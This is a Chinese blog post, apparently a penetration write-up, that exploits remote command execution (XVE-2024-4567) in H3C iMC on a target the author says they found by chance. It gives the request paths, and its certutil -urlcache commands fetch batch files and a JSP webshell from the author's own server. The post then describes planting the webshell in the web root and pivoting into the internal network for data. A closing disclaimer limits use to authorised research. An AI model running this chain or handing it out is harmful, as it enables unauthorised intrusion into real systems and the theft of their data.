利用 XVE-2024-4567 H3C iMC 远程命令执行漏洞获取权限
直接上干货
当时是无意中看到了这个h3c页面

然后搜搜h3c的历史漏洞,想看看有没有
抓包访问http ://xxxxx:8081/byod/index.xhtml 修改请求包

/selfservice/login.jsf也可以

可以看到能够执行命令,最后确定是历史漏洞XVE-2024-4567,通过网上找到绝对路径,D:/Program Files/iMC/client/web/apps/selfservice/images/
于是想通过远程命令执行传shell上去
首先尝试看是否能写入文件echo 112 > 132.txt

再用dir查看,成功写入

使用type 132.txt查看,的确写入了

然后使用del 132.txt删除就行,删不了就用del /f 132.txt 强制删除
到了这里就有一个问题了,命令太长执行不进去怎么办,菜菜的我一时没想到解决办法,后面想到了分开进去再拼接执行呢
因为命令太长,就用bat方式去写入执行
在自己的服务器上先写1.bat内容:certutil.exe -urlcache -split -f http ://xxxx/520.jsp
然后启用服务python3 -m http.server 80

再在漏洞处写入certutil.exe -urlcache -split -f http ://xxxx/1.bat,成功写入(看服务器也可以得知)

的确写进去了

再执行1.bat文件

再查看的确执行了

于是把他移动到已知的根目录下,应该是太长了,执行不了,于是继续用bat方式

写入2.bat
(move 520.jsp
"D:\Program Files\iMC\client\web\apps\selfservice\images\520.jsp")
**注:**一定是\ 而不是/
再执行命令certutil.exe -urlcache -split -f http ://xxxx/2.bat,成功写入

执行bat,把520.jsp移动过去

连接http ://xxxx:8081/selfservice/images/526.jsp


然后代理到本地,内网就好搞了,很多数据




还有很多东西不一一展示了。
温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。
涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。
如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。
